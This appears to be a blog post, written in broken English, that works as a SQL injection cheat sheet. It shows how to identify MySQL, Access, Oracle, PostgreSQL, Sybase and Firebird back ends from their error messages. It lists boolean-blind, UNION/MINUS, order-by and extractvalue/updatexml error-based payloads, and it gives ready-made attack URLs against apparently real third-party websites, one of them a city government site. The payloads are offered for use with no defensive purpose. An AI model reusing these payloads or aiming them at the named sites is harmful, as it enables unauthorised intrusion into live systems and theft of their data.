How to know SQL_DB and method of injection
MySQL server
| from error
Using the query after link
/*!50067 AND 47=47 */
page true (loading good)
MS-Access
| from error
Oracle
| from error
Using the query after link
String Concatenation
+SELECT ‘A’ || ‘B’ FROM dual; — returns AB
page true (loading good)
and can used |
+MINUS SELECT NULL, NULL, NULL FROM DUAL
page true (loading good)
PostgreSQL
| from error
String Concatenation
+AND 'str1str2'='str1'||'str2'
page true (loading good)
Sybase
| from error
Firebirdsql
| from error
To Know method of injection | used syntax
++
if order by Not working using String base
id=-1' order by 100 -- -
-- - ,, --++- ,, -++--,,
++
Blind-sql
+And+1=1 | True
+And+1=2 | Error
+And+(select+1)=1 | True
++
PostgreSQL
+AND+1::int=1 | True
+AND+1::int=2 | Error
++
Oracle
+UNION+SELECT+NULL+from+dual | True
+MINUS SELECT NULL, NULL, NULL FROM DUAL | True
++
xpath injection
+and extractvalue(rand(),concat(0x0a,version()))--
+and+extractvalue(rand(),concat(0x7e,version()))--
+and+updatexml(0x7e,concat(0x7e,(version())),0)--
++
Error Based
+or+1+group+by+concat_ws(0x3a,version(),floor(rand(0)*2))+having+min(0)+or+1--
thank you for reading...
MySQL server
| from error
PHP Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax
Using the query after link
/*!50067 AND 47=47 */
page true (loading good)
PHP Code:
https://www.manase.org/maharashtra.php?mid=86/*!50067%20AND%2047=47%20*/
PHP Code:
http://www.peterduff.com/main.php?ID=1/*!50067%20AND%2047=47%20*/
MS-Access
| from error
PHP Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'id=66''.
/product.asp, line 106
Oracle
| from error
PHP Code:
Warning: oci_parse() [function.oci-parse]: ORA-01756: une chaîne entre apostrophes ne se termine pas correctement in D:\wamp\www_mediaction\site\cfpb_reseau_france.php on line 14
Using the query after link
String Concatenation
+SELECT ‘A’ || ‘B’ FROM dual; — returns AB
page true (loading good)
PHP Code:
http://www.cfpb.fr/cfpb_reseau_france.php?id=1+SELECT%20%E2%80%98A%E2%80%99%20||%20%E2%80%98B%E2%80
%99%20FROM%20dual;%20%E2%80%94%20returns%20AB
and can used |
+MINUS SELECT NULL, NULL, NULL FROM DUAL
page true (loading good)
PHP Code:
http://www.cfpb.fr/cfpb_reseau_france.php?id=1+MINUS%20SELECT%20NULL,%20NULL,%20NULL%20FROM%20DUAL
PostgreSQL
| from error
PHP Code:
Warning: pg_query(): Query failed: ERROR: unterminated quoted string at or near
String Concatenation
+AND 'str1str2'='str1'||'str2'
page true (loading good)
PHP Code:
http://www.pittsburghpa.gov/mayor/article.htm?id=851+AND%20%27str1str2%27=%27str1%27||%27str2%27
Sybase
| from error
PHP Code:
Warning: sybase_query() [function.sybase-query]: Sybase: Server message: Unclosed quote before the character string ' '. (severity 15, procedure N/A) in /www/okfarmbureau/LFWSmartyPage.php on line 60
Firebirdsql
| from error
PHP Code:
Warning: ibase_query() [function.ibase-query]: Dynamic SQL Error SQL error code = -104 as approximate floating-point values in SQL dialect 1, but as 64-bit in \\deceasrv16\hca$\noticias\exibir_noticias.php on line 15
To Know method of injection | used syntax
++
if order by Not working using String base
id=-1' order by 100 -- -
-- - ,, --++- ,, -++--,,
++
Blind-sql
+And+1=1 | True
+And+1=2 | Error
+And+(select+1)=1 | True
++
PostgreSQL
+AND+1::int=1 | True
+AND+1::int=2 | Error
++
Oracle
+UNION+SELECT+NULL+from+dual | True
+MINUS SELECT NULL, NULL, NULL FROM DUAL | True
++
xpath injection
+and extractvalue(rand(),concat(0x0a,version()))--
+and+extractvalue(rand(),concat(0x7e,version()))--
+and+updatexml(0x7e,concat(0x7e,(version())),0)--
++
Error Based
+or+1+group+by+concat_ws(0x3a,version(),floor(rand(0)*2))+having+min(0)+or+1--
thank you for reading...
Thanks for having such information....
ReplyDeleteWay2sms login